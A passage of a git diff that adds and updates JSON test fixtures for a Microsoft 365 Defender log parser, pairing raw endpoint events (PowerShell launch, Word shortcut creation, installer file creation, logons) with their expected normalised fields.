1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "device_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-12T10:15:59.550882Z",
+    "action": {
+      "properties": {
+        "process": {
+          "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789",
+          "CommandLine": "powershell.exe",
+          "FileSize": 450560,
+          "LogonId": "398124703",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Windows PowerShell",
+          "VersionInfoInternalFileName": "POWERSHELL",
+          "VersionInfoOriginalFileName": "PowerShell.EXE",
+          "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+          "VersionInfoProductVersion": "10.0.22621.3085"
+        }
+      },
+      "type": "PowerShellCommand"
+    },
+    "host": {
+      "id": "abcdef0123456789",
+      "name": "device.name.fr"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "134294"
+        }
+      }
+    },
+    "process": {
+      "command_line": "powershell.exe",
+      "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
+      "hash": {
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+        "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+      },
+      "name": "powershell.exe",
+      "parent": {
+        "name": "WindowsTerminal.exe",
+        "pid": 884,
+        "start": "2024-11-12T09:20:42.824676Z"
+      },
+      "pid": 27568,
+      "start": "2024-11-12T10:15:16.487111Z",
+      "user": {
+        "domain": "domain",
+        "email": "JDOE@domain.fr",
+        "id": "S-1-2-3",
+        "name": "jdoe"
+      },
+      "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0"
+    },
+    "related": {
+      "hash": [
+        "44543e0c6f30415c670c1322e61ca68602d58708",
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
new file mode 100644
index 000000000..37a646715
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json
@@ -0,0 +1,103 @@
+{
+  "input": {
+    "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "device_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-12T10:17:23.330722Z",
+    "action": {
+      "properties": {
+        "process": {
+          "parent": {
+            "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456",
+            "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+            "FileSize": 1621656,
+            "LogonId": "8066492",
+            "VersionInfoCompanyName": "Microsoft Corporation",
+            "VersionInfoFileDescription": "Microsoft Word",
+            "VersionInfoInternalFileName": "WinWord",
+            "VersionInfoOriginalFileName": "WinWord.exe",
+            "VersionInfoProductName": "Microsoft Office",
+            "VersionInfoProductVersion": "16.0.17928.20216"
+          }
+        }
+      },
+      "type": "ShellLinkCreateFileEvent"
+    },
+    "file": {
+      "directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office\\Recent",
+      "hash": {
+        "md5": "5d5608654828cf052ba013b3c37cbb61",
+        "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e",
+        "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232"
+      },
+      "name": "FILENAME.LNK"
+    },
+    "host": {
+      "id": "abcdef0123456789",
+      "name": "user.company.local"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "22722"
+        }
+      }
+    },
+    "process": {
+      "name": "FILENAME.LNK",
+      "parent": {
+        "args": [
+          "\"\"",
+          "\"I:\\COMPANY\\Service\\FILE.doc\"",
+          "/n",
+          "/o"
+        ],
+        "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"",
+        "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe",
+        "hash": {
+          "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+          "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+          "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+        },
+        "name": "winword.exe",
+        "pid": 20948,
+        "start": "2024-11-12T10:02:28.777910Z",
+        "user": {
+          "domain": "company",
+          "email": "JOHNDOE@COMPANY.COM",
+          "id": "S-1-2-3",
+          "name": "jdoe"
+        },
+        "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16"
+      },
+      "start": "2024-11-06T16:05:23.113802Z",
+      "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office"
+    },
+    "related": {
+      "hash": [
+        "44543e0c6f30415c670c1322e61ca68602d58708",
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "5d5608654828cf052ba013b3c37cbb61",
+        "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+        "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232",
+        "f1d50e0d3e0ba197baf152614e0cd94487a1142e"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
index 7428190cf..94b70858f 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json
@@ -16,17 +16,19 @@
     "@timestamp": "2022-09-01T07:46:42.468408Z",
     "action": {
       "properties": {
-        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-        "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
-        "InitiatingProcessFileSize": 56824728,
-        "InitiatingProcessIntegrityLevel": "Medium",
-        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
-        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
-        "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
-        "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe",
-        "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe",
-        "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive",
-        "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002"
+        "process": {
+          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+          "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ",
+          "FileSize": 56824728,
+          "IntegrityLevel": "Medium",
+          "TokenElevation": "TokenElevationTypeDefault",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup",
+          "VersionInfoInternalFileName": "OneDriveSetup.exe",
+          "VersionInfoOriginalFileName": "OneDriveSetup.exe",
+          "VersionInfoProductName": "Microsoft OneDrive",
+          "VersionInfoProductVersion": "22.166.0807.0002"
+        }
       },
       "type": "FileDeleted"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
new file mode 100644
index 000000000..1a9daafcd
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json
@@ -0,0 +1,109 @@
+{
+  "input": {
+    "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "file"
+      ],
+      "dataset": "device_file_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-08T14:38:51.904876Z",
+    "action": {
+      "properties": {
+        "RequestAccountSid": "S-1-2-3",
+        "process": {
+          "CommandLine": "commandexec.exe /V",
+          "FileSize": 176128,
+          "IntegrityLevel": "System",
+          "TokenElevation": "TokenElevationTypeDefault",
+          "VersionInfoCompanyName": "Microsoft Corporation",
+          "VersionInfoFileDescription": "Windows\u00ae installer",
+          "VersionInfoInternalFileName": "commandexec",
+          "VersionInfoOriginalFileName": "commandexec.exe",
+          "VersionInfoProductName": "Windows Installer - Unicode",
+          "VersionInfoProductVersion": "5.0.22621.3880"
+        }
+      },
+      "type": "FileCreated"
+    },
+    "file": {
+      "directory": "C:\\Program Files\\FileName.dll",
+      "hash": {
+        "md5": "9a3af3a9ce0217bccce1d161e0b6bfde",
+        "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264",
+        "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595"
+      },
+      "name": "FileName.dll",
+      "size": 640920
+    },
+    "host": {
+      "id": "123456789abcdef",
+      "name": "device.company.local"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "341972"
+        }
+      }
+    },
+    "network": {
+      "protocol": "Local"
+    },
+    "process": {
+      "args": [
+        "/V"
+      ],
+      "command_line": "commandexec.exe /V",
+      "executable": "c:\\windows\\system32\\commandexec.exe",
+      "hash": {
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+        "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+      },
+      "name": "commandexec.exe",
+      "parent": {
+        "name": "services.exe",
+        "pid": 888,
+        "start": "2024-10-09T01:02:27.222708Z"
+      },
+      "pid": 16468,
+      "start": "2024-11-08T14:38:23.238308Z",
+      "user": {
+        "domain": "account domain",
+        "id": "S-1-2-3",
+        "name": "syst\u00e8me"
+      },
+      "working_directory": "c:\\windows\\system32"
+    },
+    "related": {
+      "hash": [
+        "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595",
+        "44543e0c6f30415c670c1322e61ca68602d58708",
+        "51a9cac9c4e8da44ffd7502be17604ee",
+        "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323",
+        "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264",
+        "9a3af3a9ce0217bccce1d161e0b6bfde"
+      ],
+      "user": [
+        "Syst\u00e8me"
+      ]
+    },
+    "user": {
+      "domain": "ACCOUNT DOMAIN",
+      "name": "Syst\u00e8me"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
index 497faa7bf..04559806a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json
@@ -16,10 +16,12 @@
     "@timestamp": "2022-09-01T07:47:58.616127Z",
     "action": {
       "properties": {
-        "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
-        "InitiatingProcessFileSize": 66560,
-        "InitiatingProcessIntegrityLevel": "Medium",
-        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault"
+        "process": {
+          "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"",
+          "FileSize": 66560,
+          "IntegrityLevel": "Medium",
+          "TokenElevation": "TokenElevationTypeDefault"
+        }
       },
       "type": "ImageLoaded"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
index 15dc7a41b..e70edf395 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json
@@ -17,9 +17,11 @@
     "action": {
       "properties": {
         "AccountSid": "S-1-1-11-1-1",
-        "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession",
         "LogonId": "111111",
-        "LogonType": "Interactive"
+        "LogonType": "Interactive",
+        "process": {
+          "CommandLine": "WinLogon.exe -SpecialSession"
+        }
       },
       "type": "LogonSuccess"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json
